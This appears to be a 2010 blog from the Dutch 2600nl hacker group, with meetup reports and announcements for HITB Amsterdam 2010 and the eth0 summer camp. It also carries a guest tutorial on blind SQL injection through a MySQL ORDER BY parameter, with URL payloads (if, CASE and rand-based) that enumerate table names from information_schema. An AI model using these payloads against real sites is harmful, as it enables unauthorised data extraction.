2600nl@HITB2010AMS && July Meet
Last week Hack in The Box did there first conference in Europe, Amsterdam in the beautiful Krasnapolsky. Some of us did a lot of volunteering for the event, which was totally worth it. This conference blew me away! We had a lot of good (lightning)talks. HITB also did an HITB labs which was a 2 hour track where stuff like METASM was demonstrated. To bad the audience didn't really get it because it's a very nice framework to quickly develop working exploits. We closed the event with the awesome afterparty we had on a boat which was sponsored by Microsoft, thanks guys!
Official pictures from the conference can be found in about 2 weeks at http://photos.hackinthebox.org/ but for some unofficial photos by drwhax you can click this link: http://www.flickr.com/photos/drwhax/tags/hackintheboxamsterdam2010/
And ofcourse the meet also also happend! It was a busy month we can say 
This friday some geeks met at a way to hot Central Station in Utrecht. Where we walked to our favourite pub with airco, away from the evil daystar.. Most of the time the meet stops around 10 PM. But this time the last group went home around 23.30 PM!!! Also we said goodbye to our malaysian friends, we will see them next year in Januari and some in October for the Kuala Lumpur conference!
Ever wanted to participate in a hackerspace but The Hague or Utrecht is to far away, and you are living close by Amsterdam? Then dont hesitate and signup for our next meeting about a hackerspace in Amsterdam! Browse to http://hspace.2600nl.net/wiki for more info!
Also don't forget we have another fine conference coming up in August. It's time for the eth0 summercamp! Same location as there last event in Wieringerwerf, boshuis. 2600nl will be doing a CTF and a webhacking challenge. And rumors somebody from 2600nl will do some talk about the goverment. Be scared...
See you at the next meet or the conference!
The June Meet
It was one of the first real summer days with high temperatures when some geeks with to Utrecht behind there computer lounge chair to join the famous 2600nl meeting! Some where stuck in traffic others we're sick and other's enjoined taking the train but everyone made it despite the evil daystar.
Our friends from hackinthebox joined the meeting as well and need less to say, they brought some nice maleysian jokes and quotes with them I won't post them here though ;>
Also next time with this awesome weather it might be a good idea to have a place where we can sit outside in the sun, most of us are to white and could use some colour. The pub is having problems also...
And now some news 
Next month we won't meet the first of friday but the second one (9 July) because the first we will have a HITB Amsterdam afterparty, also most of us are probably to tired to travel.
And while we are talking about Hitb Amsterdam... people who visit 2600nl or are longtime irc mates from us can register with a big discount! All you need todo is contact drwhax @@@ 2600nl .dot. net or hit me up on irc
I quote from the http://conference.hackinthebox.org/hitbsecconf2010ams/ website
"Welcome to the official homepage of HITBSecConf2010 – Amsterdam – the FIRST EVER HITBSecConf in Europe!!! From our humble beginnings in 2003 with HITBSecConf – Malaysia our event series has grown to not only cover Dubai in the Middle East but our new home in Amsterdam, The Netherlands!
The main aim of the HITBSecConf conference series is to create a truly technical and deep knowledge event in order to allow you to learn first hand on the security threats you face in todays super connected world. The HITBSecConf platform is used to enable the dissemination, discussion and sharing of critical network security information.
Presented by respected members of both the mainstream network security arena as well as the underground or black hat community, our events routinely highlight new and ground-breaking attack and defense methods that have not been seen or discussed in public before. HITBSecConf2010 – Amsterdam will also be a landmark event for us being the first HITBSecConf to feature 4 TRACKS! In addition to the usual Technical Track 1 and Track 2 we’re also bringing our popular HITB Lab sessions and an all new Lightning Talk segment to the Amsterdam conference.
HITBSecConf2010 – Amsterdam will also feature a two-man team based Capture The Flag Live Hacking competition, an Arduino Village, a Hackerspaces Village (with participation from spaces in Utrecht, Den Haag, Brussels, Paris, Vienna and our very own Hackerspace Kuala Lumpur in Malaysia!) In addition to the above, members from TOOOL.nl will be on hand conducting a lock picking village and a hands on lock picking lab as well. There are only 500 seats available for this first ever event and we encourage you to register early! Student pricing for the conference (1st and 2nd July) is only EUR 250!"
So see you next month at the conference or at the meeting!
eXploiting SQL injection in ORDER BY clause (MySQL 5)
A good friend of ours did some nice discovery on blind sql injection! He will explain what's new
It's pretty good stuff!
eXploiting SQL injection in ORDER BY clause (MySQL 5)
by Jacco van Tuijl
This URL will show a list orderd by column 1 :
http://www.test.com/list.php?orderby=1
This is what the SQL query that is executed on the database might look like:
SELECT id,name,price FROM list ORDER BY 1
If it would be vulnerable to SQL injection we could try :
http://www.test.com/list.php?orderby=if(true,id,price)
and
http://www.test.com/list.php?orderby=if(false,id,price)
to see if they give a different result
or
http://www.test.com/list.php?orderby=(select case when (true) then id else price end)
and
http://www.test.com/list.php?orderby=(select case when (true) then id else price end)
to see if they give a different result.
If they do give a different result you might be able to enumerate the first char of the table_name in information_schema.tables like this:
http://www.test.com/list.php?orderby=if((select char(substring(table_name,1,1)) from information_schema.tables limit 1)<=128),id,price)
and this:
http://www.test.com/list.php?orderby=(select case when ((select char(substring(table_name,1,1)) from information_schema.tables limit 1)<=128) then id else price end)
The backside of these methods is that they require knowlage of the column names.
So I worked out some different method that doesn't require knowlage about column names.
ORDER BY rand()
We can make a request like this:
http://www.test.com/list.php?orderby=rand(true)
returns a different result then this request:
http://www.test.com/list.php?orderby=rand(false)
We can use it to enumerate the first char of the table_name in information_schema.tables like this:
http://www.test.com/list.php?orderby=rand((select char(substring(table_name,1,1)) from information_schema.tables limit 1)<=128))
And it is all quoteless!
Greetingz,
Jacco van Tuijl
Eth0:2010 Summer
After co-organising hacking at random 2009, and organising there winter edition, eth0 is back with a summer edition!
The winter edition was a blast with a fine location and great talks. The summer edition can only get better!
That's why the guys and girls from eth0 will bring us another camp in August 
The location is the same as the winter edition, so it's in Wieringererf, "het Boshuis" again, which is an excellent location for events like this. So if i we're you i would invite my friends over to summercamp and have some fun
However they also want some help, they are still looking for speakers/workshops on various subjects such as: Privacy, security, hackerspaces and more. If you have something that would be cool to talk about check this out: http://eth-0.nl/cfp.php
But i'm sure you're going, and they have a nice feature for early deciders. A 35 euro discount on the early bird tickets! So for quick deciders: https://secure.eth-0.nl/tickets/summer2010/
2600nl will be present with randomdata and friends again in our famous "Hack in the random 2600 box" village. And we will throw up a wargame. If you want to submit any levels mail too: drwhax @!@!@ 2600nl dot... net
See you there
Flyer: http://wiki.eth-0.nl/images/4/43/Flyer_summer_2010_a5.svg